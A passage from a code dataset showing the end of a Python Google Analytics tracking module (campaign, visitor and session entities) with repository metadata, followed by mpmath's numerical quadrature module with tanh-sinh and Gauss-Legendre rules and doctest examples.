'utmcmd': 'medium',
'utmctr': 'term',
'utmcct': 'content',
}
def __init__(self, typ):
self._type = None
self.creation_time = None
self.response_count = 0
self.id = None
self.source = None
self.g_click_id = None
self.d_click_id = None
self.name = None
self.medium = None
self.term = None
self.content = None
if typ:
if typ not in ('direct', 'organic', 'referral'):
raise ValueError('Campaign type has to be one of the Campaign::TYPE_* constant values.')
self._type = typ
if typ == Campaign.TYPE_DIRECT:
self.name = '(direct)'
self.source = '(direct)'
self.medium = '(none)'
elif typ == Campaign.TYPE_REFERRAL:
self.name = '(referral)'
self.medium = 'referral'
elif typ == Campaign.TYPE_ORGANIC:
self.name = '(organic)'
self.medium = 'organic'
else:
self._type = None
self.creation_time = datetime.utcnow()
def validate(self):
if not self.source:
raise exceptions.ValidationError('Campaigns need to have at least the "source" attribute defined.')
@staticmethod
def create_from_referrer(url):
obj = Campaign(Campaign.TYPE_REFERRAL)
parse_rslt = urlparse(url)
obj.source = parse_rslt.netloc
obj.content = parse_rslt.path
return obj
def extract_from_utmz(self, utmz):
parts = utmz.split('.', 4)
if len(parts) != 5:
raise ValueError('The given "__utmz" cookie value is invalid.')
self.creation_time = utils.convert_ga_timestamp(parts[1])
self.response_count = int(parts[3])
params = parts[4].split(Campaign.CAMPAIGN_DELIMITER)
for param in params:
key, val = param.split('=')
try:
setattr(self, self.UTMZ_PARAM_MAP[key], unquote_plus(val))
except KeyError:
continue
return self
class CustomVariable(object):
'''
Represent a Custom Variable
Properties:
index -- Is the slot, you have 5 slots
name -- Name given to custom variable
value -- Value for the variable
scope -- Scope can be any one of 1, 2 or 3.
WATCH OUT: It's a known issue that GA will not decode URL-encoded
characters in custom variable names and values properly, so spaces
will show up as "%20" in the interface etc. (applicable to name & value)
http://www.google.com/support/forum/p/Google%20Analytics/thread?tid=2cdb3ec0be32e078
'''
SCOPE_VISITOR = 1
SCOPE_SESSION = 2
SCOPE_PAGE = 3
def __init__(self, index=None, name=None, value=None, scope=3):
self.index = index
self.name = name
self.value = value
self.scope = CustomVariable.SCOPE_PAGE
if scope:
self.scope = scope
def __setattr__(self, name, value):
if name == 'scope':
if value and value not in range(1, 4):
raise ValueError('Custom Variable scope has to be one of the 1,2 or 3')
if name == 'index':
# Custom Variables are limited to five slots officially, but there seems to be a
# trick to allow for more of them which we could investigate at a later time (see
# http://analyticsimpact.com/2010/05/24/get-more-than-5-custom-variables-in-google-analytics/
if value and (value < 0 or value > 5):
raise ValueError('Custom Variable index has to be between 1 and 5.')
object.__setattr__(self, name, value)
def validate(self):
'''
According to the GA documentation, there is a limit to the combined size of
name and value of 64 bytes after URL encoding,
see http://code.google.com/apis/analytics/docs/tracking/gaTrackingCustomVariables.html#varTypes
and http://xahlee.org/js/google_analytics_tracker_2010-07-01_expanded.js line 563
This limit was increased to 128 bytes BEFORE encoding with the 2012-01 release of ga.js however,
see http://code.google.com/apis/analytics/community/gajs_changelog.html
'''
if len('%s%s' % (self.name, self.value)) > 128:
raise exceptions.ValidationError('Custom Variable combined name and value length must not be larger than 128 bytes.')
class Event(object):
'''
Represents an Event
http://code.google.com/apis/analytics/docs/tracking/eventTrackerOverview.html
Properties:
category -- The general event category
action -- The action for the event
label -- An optional descriptor for the event
value -- An optional value associated with the event. You can see your
event values in the Overview, Categories, and Actions reports,
where they are listed by event or aggregated across events,
depending upon your report view.
noninteraction -- By default, event hits will impact a visitor's bounce rate.
By setting this parameter to true, this event hit
will not be used in bounce rate calculations.
(default False)
'''
def __init__(self, category=None, action=None, label=None, value=None, noninteraction=False):
self.category = category
self.action = action
self.label = label
self.value = value
self.noninteraction = bool(noninteraction)
if self.noninteraction and not self.value:
self.value = 0
def validate(self):
if not(self.category and self.action):
raise exceptions.ValidationError('Events, at least need to have a category and action defined.')
class Item(object):
'''
Represents an Item in Transaction
Properties:
order_id -- Order ID, will be mapped to "utmtid" parameter
sku -- Product Code. This is the sku code for a given product, will be mapped to "utmipc" parameter
name -- Product Name, will be mapped to "utmipn" parameter
variation -- Variations on an item, will be mapped to "utmiva" parameter
price -- Unit Price. Value is set to numbers only, will be mapped to "utmipr" parameter
quantity -- Unit Quantity, will be mapped to "utmiqt" parameter
'''
def __init__(self):
self.order_id = None
self.sku = None
self.name = None
self.variation = None
self.price = None
self.quantity = 1
def validate(self):
if not self.sku:
raise exceptions.ValidationError('sku/product is a required parameter')
class Page(object):
'''
Contains all parameters needed for tracking a page
Properties:
path -- Page request URI, will be mapped to "utmp" parameter
title -- Page title, will be mapped to "utmdt" parameter
charset -- Charset encoding, will be mapped to "utmcs" parameter
referrer -- Referer URL, will be mapped to "utmr" parameter
load_time -- Page load time in milliseconds, will be encoded into "utme" parameter.
'''
REFERRER_INTERNAL = '0'
def __init__(self, path):
self.path = None
self.title = None
self.charset = None
self.referrer = None
self.load_time = None
if path:
self.path = path
def __setattr__(self, name, value):
if name == 'path':
if value and value != '':
if value[0] != '/':
raise ValueError('The page path should always start with a slash ("/").')
elif name == 'load_time':
if value and not isinstance(value, int):
raise ValueError('Page load time must be specified in integer milliseconds.')
object.__setattr__(self, name, value)
class Session(object):
'''
You should serialize this object and store it in the user session to keep it
persistent between requests (similar to the "__umtb" cookie of the GA Javascript client).
Properties:
session_id -- A unique per-session ID, will be mapped to "utmhid" parameter
track_count -- The amount of pageviews that were tracked within this session so far,
will be part of the "__utmb" cookie parameter.
Will get incremented automatically upon each request
start_time -- Timestamp of the start of this new session, will be part of the "__utmb" cookie parameter
'''
def __init__(self):
self.session_id = utils.get_32bit_random_num()
self.track_count = 0
self.start_time = datetime.utcnow()
@staticmethod
def generate_session_id():
return utils.get_32bit_random_num()
def extract_from_utmb(self, utmb):
'''
Will extract information for the "trackCount" and "startTime"
properties from the given "__utmb" cookie value.
'''
parts = utmb.split('.')
if len(parts) != 4:
raise ValueError('The given "__utmb" cookie value is invalid.')
self.track_count = int(parts[1])
self.start_time = utils.convert_ga_timestamp(parts[3])
return self
class SocialInteraction(object):
'''
Properties:
action -- Required. A string representing the social action being tracked,
will be mapped to "utmsa" parameter
network -- Required. A string representing the social network being tracked,
will be mapped to "utmsn" parameter
target -- Optional. A string representing the URL (or resource) which receives the action.
'''
def __init__(self, action=None, network=None, target=None):
self.action = action
self.network = network
self.target = target
def validate(self):
if not(self.action and self.network):
raise exceptions.ValidationError('Social interactions need to have at least the "network" and "action" attributes defined.')
class Transaction(object):
'''
Represents parameters for a Transaction call
Properties:
order_id -- Order ID, will be mapped to "utmtid" parameter
affiliation -- Affiliation, Will be mapped to "utmtst" parameter
total -- Total Cost, will be mapped to "utmtto" parameter
tax -- Tax Cost, will be mapped to "utmttx" parameter
shipping -- Shipping Cost, values as for unit and price, will be mapped to "utmtsp" parameter
city -- Billing City, will be mapped to "utmtci" parameter
state -- Billing Region, will be mapped to "utmtrg" parameter
country -- Billing Country, will be mapped to "utmtco" parameter
items -- @entity.Items in a transaction
'''
def __init__(self):
self.items = []
self.order_id = None
self.affiliation = None
self.total = None
self.tax = None
self.shipping = None
self.city = None
self.state = None
self.country = None
def __setattr__(self, name, value):
if name == 'order_id':
for itm in self.items:
itm.order_id = value
object.__setattr__(self, name, value)
def validate(self):
if len(self.items) == 0:
raise exceptions.ValidationError('Transaction need to consist of at least one item')
def add_item(self, item):
''' item of type entities.Item '''
if isinstance(item, Item):
item.order_id = self.order_id
self.items.append(item)
class Visitor(object):
'''
You should serialize this object and store it in the user database to keep it
persistent for the same user permanently (similar to the "__umta" cookie of
the GA Javascript client).
Properties:
unique_id -- Unique user ID, will be part of the "__utma" cookie parameter
first_visit_time -- Time of the very first visit of this user, will be part of the "__utma" cookie parameter
previous_visit_time -- Time of the previous visit of this user, will be part of the "__utma" cookie parameter
current_visit_time -- Time of the current visit of this user, will be part of the "__utma" cookie parameter
visit_count -- Amount of total visits by this user, will be part of the "__utma" cookie parameter
ip_address -- IP Address of the end user, will be mapped to "utmip" parameter and "X-Forwarded-For" request header
user_agent -- User agent string of the end user, will be mapped to "User-Agent" request header
locale -- Locale string (country part optional) will be mapped to "utmul" parameter
flash_version -- Visitor's Flash version, will be maped to "utmfl" parameter
java_enabled -- Visitor's Java support, will be mapped to "utmje" parameter
screen_colour_depth -- Visitor's screen color depth, will be mapped to "utmsc" parameter
screen_resolution -- Visitor's screen resolution, will be mapped to "utmsr" parameter
'''
def __init__(self):
now = datetime.utcnow()
self.unique_id = None
self.first_visit_time = now
self.previous_visit_time = now
self.current_visit_time = now
self.visit_count = 1
self.ip_address = None
self.user_agent = None
self.locale = None
self.flash_version = None
self.java_enabled = None
self.screen_colour_depth = None
self.screen_resolution = None
def __setattr__(self, name, value):
if name == 'unique_id':
if value and value < 0 or value > 0x7fffffff:
raise ValueError('Visitor unique ID has to be a 32-bit integer between 0 and 0x7fffffff')
object.__setattr__(self, name, value)
def __getattribute__(self, name):
if name == 'unique_id':
tmp = object.__getattribute__(self, name)
if tmp is None:
self.unique_id = self.generate_unique_id()
return object.__getattribute__(self, name)
def __getstate__(self):
state = self.__dict__
if state.get('user_agent') is None:
state['unique_id'] = self.generate_unique_id()
return state
def extract_from_utma(self, utma):
'''
Will extract information for the "unique_id", "first_visit_time", "previous_visit_time",
"current_visit_time" and "visit_count" properties from the given "__utma" cookie value.
'''
parts = utma.split('.')
if len(parts) != 6:
raise ValueError('The given "__utma" cookie value is invalid.')
self.unique_id = int(parts[1])
self.first_visit_time = utils.convert_ga_timestamp(parts[2])
self.previous_visit_time = utils.convert_ga_timestamp(parts[3])
self.current_visit_time = utils.convert_ga_timestamp(parts[4])
self.visit_count = int(parts[5])
return self
def extract_from_server_meta(self, meta):
'''
Will extract information for the "ip_address", "user_agent" and "locale"
properties from the given WSGI REQUEST META variable or equivalent.
'''
if 'REMOTE_ADDR' in meta and meta['REMOTE_ADDR']:
ip = None
for key in ('HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'):
if key in meta and not ip:
ips = meta.get(key, '').split(',')
ip = ips[len(ips) - 1].strip()
if not utils.is_valid_ip(ip):
ip = ''
if utils.is_private_ip(ip):
ip = ''
if ip:
self.ip_address = ip
if 'HTTP_USER_AGENT' in meta and meta['HTTP_USER_AGENT']:
self.user_agent = meta['HTTP_USER_AGENT']
if 'HTTP_ACCEPT_LANGUAGE' in meta and meta['HTTP_ACCEPT_LANGUAGE']:
user_locals = []
matched_locales = utils.validate_locale(meta['HTTP_ACCEPT_LANGUAGE'])
if matched_locales:
lang_lst = map((lambda x: x.replace('-', '_')), (i[1] for i in matched_locales))
quality_lst = map((lambda x: x and x or 1), (float(i[4] and i[4] or '0') for i in matched_locales))
lang_quality_map = map((lambda x, y: (x, y)), lang_lst, quality_lst)
user_locals = [x[0] for x in sorted(lang_quality_map, key=itemgetter(1), reverse=True)]
if user_locals:
self.locale = user_locals[0]
return self
def generate_hash(self):
'''Generates a hashed value from user-specific properties.'''
tmpstr = "%s%s%s" % (self.user_agent, self.screen_resolution, self.screen_colour_depth)
return utils.generate_hash(tmpstr)
def generate_unique_id(self):
'''Generates a unique user ID from the current user-specific properties.'''
return ((utils.get_32bit_random_num() ^ self.generate_hash()) & 0x7fffffff)
def add_session(self, session):
'''
Updates the "previousVisitTime", "currentVisitTime" and "visitCount"
fields based on the given session object.
'''
start_time = session.start_time
if start_time != self.current_visit_time:
self.previous_visit_time = self.current_visit_time
self.current_visit_time = start_time
self.visit_count = self.visit_count + 1
|
steeve/xbmctorrent
|
resources/site-packages/pyga/entities.py
|
Python
|
gpl-3.0
| 19,442
|
[
"VisIt"
] |
d8583aa567224e7f1335578a93c62c2898c60fdd3ab68e3c81c6676f340c3fb4
|
import math
from ..libmp.backend import xrange
class QuadratureRule(object):
"""
Quadrature rules are implemented using this class, in order to
simplify the code and provide a common infrastructure
for tasks such as error estimation and node caching.
You can implement a custom quadrature rule by subclassing
:class:`QuadratureRule` and implementing the appropriate
methods. The subclass can then be used by :func:`~mpmath.quad` by
passing it as the *method* argument.
:class:`QuadratureRule` instances are supposed to be singletons.
:class:`QuadratureRule` therefore implements instance caching
in :func:`~mpmath.__new__`.
"""
def __init__(self, ctx):
self.ctx = ctx
self.standard_cache = {}
self.transformed_cache = {}
self.interval_count = {}
def clear(self):
"""
Delete cached node data.
"""
self.standard_cache = {}
self.transformed_cache = {}
self.interval_count = {}
def calc_nodes(self, degree, prec, verbose=False):
r"""
Compute nodes for the standard interval `[-1, 1]`. Subclasses
should probably implement only this method, and use
:func:`~mpmath.get_nodes` method to retrieve the nodes.
"""
raise NotImplementedError
def get_nodes(self, a, b, degree, prec, verbose=False):
"""
Return nodes for given interval, degree and precision. The
nodes are retrieved from a cache if already computed;
otherwise they are computed by calling :func:`~mpmath.calc_nodes`
and are then cached.
Subclasses should probably not implement this method,
but just implement :func:`~mpmath.calc_nodes` for the actual
node computation.
"""
key = (a, b, degree, prec)
if key in self.transformed_cache:
return self.transformed_cache[key]
orig = self.ctx.prec
try:
self.ctx.prec = prec+20
# Get nodes on standard interval
if (degree, prec) in self.standard_cache:
nodes = self.standard_cache[degree, prec]
else:
nodes = self.calc_nodes(degree, prec, verbose)
self.standard_cache[degree, prec] = nodes
# Transform to general interval
nodes = self.transform_nodes(nodes, a, b, verbose)
if key in self.interval_count:
self.transformed_cache[key] = nodes
else:
self.interval_count[key] = True
finally:
self.ctx.prec = orig
return nodes
def transform_nodes(self, nodes, a, b, verbose=False):
r"""
Rescale standardized nodes (for `[-1, 1]`) to a general
interval `[a, b]`. For a finite interval, a simple linear
change of variables is used. Otherwise, the following
transformations are used:
.. math ::
[a, \infty] : t = \frac{1}{x} + (a-1)
[-\infty, b] : t = (b+1) - \frac{1}{x}
[-\infty, \infty] : t = \frac{x}{\sqrt{1-x^2}}
"""
ctx = self.ctx
a = ctx.convert(a)
b = ctx.convert(b)
one = ctx.one
if (a, b) == (-one, one):
return nodes
half = ctx.mpf(0.5)
new_nodes = []
if ctx.isinf(a) or ctx.isinf(b):
if (a, b) == (ctx.ninf, ctx.inf):
p05 = -half
for x, w in nodes:
x2 = x*x
px1 = one-x2
spx1 = px1**p05
x = x*spx1
w *= spx1/px1
new_nodes.append((x, w))
elif a == ctx.ninf:
b1 = b+1
for x, w in nodes:
u = 2/(x+one)
x = b1-u
w *= half*u**2
new_nodes.append((x, w))
elif b == ctx.inf:
a1 = a-1
for x, w in nodes:
u = 2/(x+one)
x = a1+u
w *= half*u**2
new_nodes.append((x, w))
elif a == ctx.inf or b == ctx.ninf:
return [(x,-w) for (x,w) in self.transform_nodes(nodes, b, a, verbose)]
else:
raise NotImplementedError
else:
# Simple linear change of variables
C = (b-a)/2
D = (b+a)/2
for x, w in nodes:
new_nodes.append((D+C*x, C*w))
return new_nodes
def guess_degree(self, prec):
"""
Given a desired precision `p` in bits, estimate the degree `m`
of the quadrature required to accomplish full accuracy for
typical integrals. By default, :func:`~mpmath.quad` will perform up
to `m` iterations. The value of `m` should be a slight
overestimate, so that "slightly bad" integrals can be dealt
with automatically using a few extra iterations. On the
other hand, it should not be too big, so :func:`~mpmath.quad` can
quit within a reasonable amount of time when it is given
an "unsolvable" integral.
The default formula used by :func:`~mpmath.guess_degree` is tuned
for both :class:`TanhSinh` and :class:`GaussLegendre`.
The output is roughly as follows:
+---------+---------+
| `p` | `m` |
+=========+=========+
| 50 | 6 |
+---------+---------+
| 100 | 7 |
+---------+---------+
| 500 | 10 |
+---------+---------+
| 3000 | 12 |
+---------+---------+
This formula is based purely on a limited amount of
experimentation and will sometimes be wrong.
"""
# Expected degree
# XXX: use mag
g = int(4 + max(0, self.ctx.log(prec/30.0, 2)))
# Reasonable "worst case"
g += 2
return g
def estimate_error(self, results, prec, epsilon):
r"""
Given results from integrations `[I_1, I_2, \ldots, I_k]` done
with a quadrature of rule of degree `1, 2, \ldots, k`, estimate
the error of `I_k`.
For `k = 2`, we estimate `|I_{\infty}-I_2|` as `|I_2-I_1|`.
For `k > 2`, we extrapolate `|I_{\infty}-I_k| \approx |I_{k+1}-I_k|`
from `|I_k-I_{k-1}|` and `|I_k-I_{k-2}|` under the assumption
that each degree increment roughly doubles the accuracy of
the quadrature rule (this is true for both :class:`TanhSinh`
and :class:`GaussLegendre`). The extrapolation formula is given
by Borwein, Bailey & Girgensohn. Although not very conservative,
this method seems to be very robust in practice.
"""
if len(results) == 2:
return abs(results[0]-results[1])
try:
if results[-1] == results[-2] == results[-3]:
return self.ctx.zero
D1 = self.ctx.log(abs(results[-1]-results[-2]), 10)
D2 = self.ctx.log(abs(results[-1]-results[-3]), 10)
except ValueError:
return epsilon
D3 = -prec
D4 = min(0, max(D1**2/D2, 2*D1, D3))
return self.ctx.mpf(10) ** int(D4)
def summation(self, f, points, prec, epsilon, max_degree, verbose=False):
"""
Main integration function. Computes the 1D integral over
the interval specified by *points*. For each subinterval,
performs quadrature of degree from 1 up to *max_degree*
until :func:`~mpmath.estimate_error` signals convergence.
:func:`~mpmath.summation` transforms each subintegration to
the standard interval and then calls :func:`~mpmath.sum_next`.
"""
ctx = self.ctx
I = err = ctx.zero
for i in xrange(len(points)-1):
a, b = points[i], points[i+1]
if a == b:
continue
# XXX: we could use a single variable transformation,
# but this is not good in practice. We get better accuracy
# by having 0 as an endpoint.
if (a, b) == (ctx.ninf, ctx.inf):
_f = f
f = lambda x: _f(-x) + _f(x)
a, b = (ctx.zero, ctx.inf)
results = []
for degree in xrange(1, max_degree+1):
nodes = self.get_nodes(a, b, degree, prec, verbose)
if verbose:
print("Integrating from %s to %s (degree %s of %s)" % \
(ctx.nstr(a), ctx.nstr(b), degree, max_degree))
results.append(self.sum_next(f, nodes, degree, prec, results, verbose))
if degree > 1:
err = self.estimate_error(results, prec, epsilon)
if err <= epsilon:
break
if verbose:
print("Estimated error:", ctx.nstr(err))
I += results[-1]
if err > epsilon:
if verbose:
print("Failed to reach full accuracy. Estimated error:", ctx.nstr(err))
return I, err
def sum_next(self, f, nodes, degree, prec, previous, verbose=False):
r"""
Evaluates the step sum `\sum w_k f(x_k)` where the *nodes* list
contains the `(w_k, x_k)` pairs.
:func:`~mpmath.summation` will supply the list *results* of
values computed by :func:`~mpmath.sum_next` at previous degrees, in
case the quadrature rule is able to reuse them.
"""
return self.ctx.fdot((w, f(x)) for (x,w) in nodes)
class TanhSinh(QuadratureRule):
r"""
This class implements "tanh-sinh" or "doubly exponential"
quadrature. This quadrature rule is based on the Euler-Maclaurin
integral formula. By performing a change of variables involving
nested exponentials / hyperbolic functions (hence the name), the
derivatives at the endpoints vanish rapidly. Since the error term
in the Euler-Maclaurin formula depends on the derivatives at the
endpoints, a simple step sum becomes extremely accurate. In
practice, this means that doubling the number of evaluation
points roughly doubles the number of accurate digits.
Comparison to Gauss-Legendre:
* Initial computation of nodes is usually faster
* Handles endpoint singularities better
* Handles infinite integration intervals better
* Is slower for smooth integrands once nodes have been computed
The implementation of the tanh-sinh algorithm is based on the
description given in Borwein, Bailey & Girgensohn, "Experimentation
in Mathematics - Computational Paths to Discovery", A K Peters,
2003, pages 312-313. In the present implementation, a few
improvements have been made:
* A more efficient scheme is used to compute nodes (exploiting
recurrence for the exponential function)
* The nodes are computed successively instead of all at once
Various documents describing the algorithm are available online, e.g.:
* http://crd.lbl.gov/~dhbailey/dhbpapers/dhb-tanh-sinh.pdf
* http://users.cs.dal.ca/~jborwein/tanh-sinh.pdf
"""
def sum_next(self, f, nodes, degree, prec, previous, verbose=False):
"""
Step sum for tanh-sinh quadrature of degree `m`. We exploit the
fact that half of the abscissas at degree `m` are precisely the
abscissas from degree `m-1`. Thus reusing the result from
the previous level allows a 2x speedup.
"""
h = self.ctx.mpf(2)**(-degree)
# Abscissas overlap, so reusing saves half of the time
if previous:
S = previous[-1]/(h*2)
else:
S = self.ctx.zero
S += self.ctx.fdot((w,f(x)) for (x,w) in nodes)
return h*S
def calc_nodes(self, degree, prec, verbose=False):
r"""
The abscissas and weights for tanh-sinh quadrature of degree
`m` are given by
.. math::
x_k = \tanh(\pi/2 \sinh(t_k))
w_k = \pi/2 \cosh(t_k) / \cosh(\pi/2 \sinh(t_k))^2
where `t_k = t_0 + hk` for a step length `h \sim 2^{-m}`. The
list of nodes is actually infinite, but the weights die off so
rapidly that only a few are needed.
"""
ctx = self.ctx
nodes = []
extra = 20
ctx.prec += extra
tol = ctx.ldexp(1, -prec-10)
pi4 = ctx.pi/4
# For simplicity, we work in steps h = 1/2^n, with the first point
# offset so that we can reuse the sum from the previous degree
# We define degree 1 to include the "degree 0" steps, including
# the point x = 0. (It doesn't work well otherwise; not sure why.)
t0 = ctx.ldexp(1, -degree)
if degree == 1:
#nodes.append((mpf(0), pi4))
#nodes.append((-mpf(0), pi4))
nodes.append((ctx.zero, ctx.pi/2))
h = t0
else:
h = t0*2
# Since h is fixed, we can compute the next exponential
# by simply multiplying by exp(h)
expt0 = ctx.exp(t0)
a = pi4 * expt0
b = pi4 / expt0
udelta = ctx.exp(h)
urdelta = 1/udelta
for k in xrange(0, 20*2**degree+1):
# Reference implementation:
# t = t0 + k*h
# x = tanh(pi/2 * sinh(t))
# w = pi/2 * cosh(t) / cosh(pi/2 * sinh(t))**2
# Fast implementation. Note that c = exp(pi/2 * sinh(t))
c = ctx.exp(a-b)
d = 1/c
co = (c+d)/2
si = (c-d)/2
x = si / co
w = (a+b) / co**2
diff = abs(x-1)
if diff <= tol:
break
nodes.append((x, w))
nodes.append((-x, w))
a *= udelta
b *= urdelta
if verbose and k % 300 == 150:
# Note: the number displayed is rather arbitrary. Should
# figure out how to print something that looks more like a
# percentage
print("Calculating nodes:", ctx.nstr(-ctx.log(diff, 10) / prec))
ctx.prec -= extra
return nodes
class GaussLegendre(QuadratureRule):
"""
This class implements Gauss-Legendre quadrature, which is
exceptionally efficient for polynomials and polynomial-like (i.e.
very smooth) integrands.
The abscissas and weights are given by roots and values of
Legendre polynomials, which are the orthogonal polynomials
on `[-1, 1]` with respect to the unit weight
(see :func:`~mpmath.legendre`).
In this implementation, we take the "degree" `m` of the quadrature
to denote a Gauss-Legendre rule of degree `3 \cdot 2^m` (following
Borwein, Bailey & Girgensohn). This way we get quadratic, rather
than linear, convergence as the degree is incremented.
Comparison to tanh-sinh quadrature:
* Is faster for smooth integrands once nodes have been computed
* Initial computation of nodes is usually slower
* Handles endpoint singularities worse
* Handles infinite integration intervals worse
"""
def calc_nodes(self, degree, prec, verbose=False):
"""
Calculates the abscissas and weights for Gauss-Legendre
quadrature of degree of given degree (actually `3 \cdot 2^m`).
"""
ctx = self.ctx
# It is important that the epsilon is set lower than the
# "real" epsilon
epsilon = ctx.ldexp(1, -prec-8)
# Fairly high precision might be required for accurate
# evaluation of the roots
orig = ctx.prec
ctx.prec = int(prec*1.5)
if degree == 1:
x = ctx.mpf(3)/5
w = ctx.mpf(5)/9
nodes = [(-x,w),(ctx.zero,ctx.mpf(8)/9),(x,w)]
ctx.prec = orig
return nodes
nodes = []
n = 3*2**(degree-1)
upto = n//2 + 1
for j in xrange(1, upto):
# Asymptotic formula for the roots
r = ctx.mpf(math.cos(math.pi*(j-0.25)/(n+0.5)))
# Newton iteration
while 1:
t1, t2 = 1, 0
# Evaluates the Legendre polynomial using its defining
# recurrence relation
for j1 in xrange(1,n+1):
t3, t2, t1 = t2, t1, ((2*j1-1)*r*t1 - (j1-1)*t2)/j1
t4 = n*(r*t1- t2)/(r**2-1)
t5 = r
a = t1/t4
r = r - a
if abs(a) < epsilon:
break
x = r
w = 2/((1-r**2)*t4**2)
if verbose and j % 30 == 15:
print("Computing nodes (%i of %i)" % (j, upto))
nodes.append((x, w))
nodes.append((-x, w))
ctx.prec = orig
return nodes
class QuadratureMethods:
def __init__(ctx, *args, **kwargs):
ctx._gauss_legendre = GaussLegendre(ctx)
ctx._tanh_sinh = TanhSinh(ctx)
def quad(ctx, f, *points, **kwargs):
r"""
Computes a single, double or triple integral over a given
1D interval, 2D rectangle, or 3D cuboid. A basic example::
>>> from mpmath import *
>>> mp.dps = 15; mp.pretty = True
>>> quad(sin, [0, pi])
2.0
A basic 2D integral::
>>> f = lambda x, y: cos(x+y/2)
>>> quad(f, [-pi/2, pi/2], [0, pi])
4.0
**Interval format**
The integration range for each dimension may be specified
using a list or tuple. Arguments are interpreted as follows:
``quad(f, [x1, x2])`` -- calculates
`\int_{x_1}^{x_2} f(x) \, dx`
``quad(f, [x1, x2], [y1, y2])`` -- calculates
`\int_{x_1}^{x_2} \int_{y_1}^{y_2} f(x,y) \, dy \, dx`
``quad(f, [x1, x2], [y1, y2], [z1, z2])`` -- calculates
`\int_{x_1}^{x_2} \int_{y_1}^{y_2} \int_{z_1}^{z_2} f(x,y,z)
\, dz \, dy \, dx`
Endpoints may be finite or infinite. An interval descriptor
may also contain more than two points. In this
case, the integration is split into subintervals, between
each pair of consecutive points. This is useful for
dealing with mid-interval discontinuities, or integrating
over large intervals where the function is irregular or
oscillates.
**Options**
:func:`~mpmath.quad` recognizes the following keyword arguments:
*method*
Chooses integration algorithm (described below).
*error*
If set to true, :func:`~mpmath.quad` returns `(v, e)` where `v` is the
integral and `e` is the estimated error.
*maxdegree*
Maximum degree of the quadrature rule to try before
quitting.
*verbose*
Print details about progress.
**Algorithms**
Mpmath presently implements two integration algorithms: tanh-sinh
quadrature and Gauss-Legendre quadrature. These can be selected
using *method='tanh-sinh'* or *method='gauss-legendre'* or by
passing the classes *method=TanhSinh*, *method=GaussLegendre*.
The functions :func:`~mpmath.quadts` and :func:`~mpmath.quadgl` are also available
as shortcuts.
Both algorithms have the property that doubling the number of
evaluation points roughly doubles the accuracy, so both are ideal
for high precision quadrature (hundreds or thousands of digits).
At high precision, computing the nodes and weights for the
integration can be expensive (more expensive than computing the
function values). To make repeated integrations fast, nodes
are automatically cached.
The advantages of the tanh-sinh algorithm are that it tends to
handle endpoint singularities well, and that the nodes are cheap
to compute on the first run. For these reasons, it is used by
:func:`~mpmath.quad` as the default algorithm.
Gauss-Legendre quadrature often requires fewer function
evaluations, and is therefore often faster for repeated use, but
the algorithm does not handle endpoint singularities as well and
the nodes are more expensive to compute. Gauss-Legendre quadrature
can be a better choice if the integrand is smooth and repeated
integrations are required (e.g. for multiple integrals).
See the documentation for :class:`TanhSinh` and
:class:`GaussLegendre` for additional details.
**Examples of 1D integrals**
Intervals may be infinite or half-infinite. The following two
examples evaluate the limits of the inverse tangent function
(`\int 1/(1+x^2) = \tan^{-1} x`), and the Gaussian integral
`\int_{\infty}^{\infty} \exp(-x^2)\,dx = \sqrt{\pi}`::
>>> mp.dps = 15
>>> quad(lambda x: 2/(x**2+1), [0, inf])
3.14159265358979
>>> quad(lambda x: exp(-x**2), [-inf, inf])**2
3.14159265358979
Integrals can typically be resolved to high precision.
The following computes 50 digits of `\pi` by integrating the
area of the half-circle defined by `x^2 + y^2 \le 1`,
`-1 \le x \le 1`, `y \ge 0`::
>>> mp.dps = 50
>>> 2*quad(lambda x: sqrt(1-x**2), [-1, 1])
3.1415926535897932384626433832795028841971693993751
One can just as well compute 1000 digits (output truncated)::
>>> mp.dps = 1000
>>> 2*quad(lambda x: sqrt(1-x**2), [-1, 1]) #doctest:+ELLIPSIS
3.141592653589793238462643383279502884...216420198
Complex integrals are supported. The following computes
a residue at `z = 0` by integrating counterclockwise along the
diamond-shaped path from `1` to `+i` to `-1` to `-i` to `1`::
>>> mp.dps = 15
>>> chop(quad(lambda z: 1/z, [1,j,-1,-j,1]))
(0.0 + 6.28318530717959j)
**Examples of 2D and 3D integrals**
Here are several nice examples of analytically solvable
2D integrals (taken from MathWorld [1]) that can be evaluated
to high precision fairly rapidly by :func:`~mpmath.quad`::
>>> mp.dps = 30
>>> f = lambda x, y: (x-1)/((1-x*y)*log(x*y))
>>> quad(f, [0, 1], [0, 1])
0.577215664901532860606512090082
>>> +euler
0.577215664901532860606512090082
>>> f = lambda x, y: 1/sqrt(1+x**2+y**2)
>>> quad(f, [-1, 1], [-1, 1])
3.17343648530607134219175646705
>>> 4*log(2+sqrt(3))-2*pi/3
3.17343648530607134219175646705
>>> f = lambda x, y: 1/(1-x**2 * y**2)
>>> quad(f, [0, 1], [0, 1])
1.23370055013616982735431137498
>>> pi**2 / 8
1.23370055013616982735431137498
>>> quad(lambda x, y: 1/(1-x*y), [0, 1], [0, 1])
1.64493406684822643647241516665
>>> pi**2 / 6
1.64493406684822643647241516665
Multiple integrals may be done over infinite ranges::
>>> mp.dps = 15
>>> print(quad(lambda x,y: exp(-x-y), [0, inf], [1, inf]))
0.367879441171442
>>> print(1/e)
0.367879441171442
For nonrectangular areas, one can call :func:`~mpmath.quad` recursively.
For example, we can replicate the earlier example of calculating
`\pi` by integrating over the unit-circle, and actually use double
quadrature to actually measure the area circle::
>>> f = lambda x: quad(lambda y: 1, [-sqrt(1-x**2), sqrt(1-x**2)])
>>> quad(f, [-1, 1])
3.14159265358979
Here is a simple triple integral::
>>> mp.dps = 15
>>> f = lambda x,y,z: x*y/(1+z)
>>> quad(f, [0,1], [0,1], [1,2], method='gauss-legendre')
0.101366277027041
>>> (log(3)-log(2))/4
0.101366277027041
**Singularities**
Both tanh-sinh and Gauss-Legendre quadrature are designed to
integrate smooth (infinitely differentiable) functions. Neither
algorithm copes well with mid-interval singularities (such as
mid-interval discontinuities in `f(x)` or `f'(x)`).
The best solution is to split the integral into parts::
>>> mp.dps = 15
>>> quad(lambda x: abs(sin(x)), [0, 2*pi]) # Bad
3.99900894176779
>>> quad(lambda x: abs(sin(x)), [0, pi, 2*pi]) # Good
4.0
The tanh-sinh rule often works well for integrands having a
singularity at one or both endpoints::
>>> mp.dps = 15
>>> quad(log, [0, 1], method='tanh-sinh') # Good
-1.0
>>> quad(log, [0, 1], method='gauss-legendre') # Bad
-0.999932197413801
However, the result may still be inaccurate for some functions::
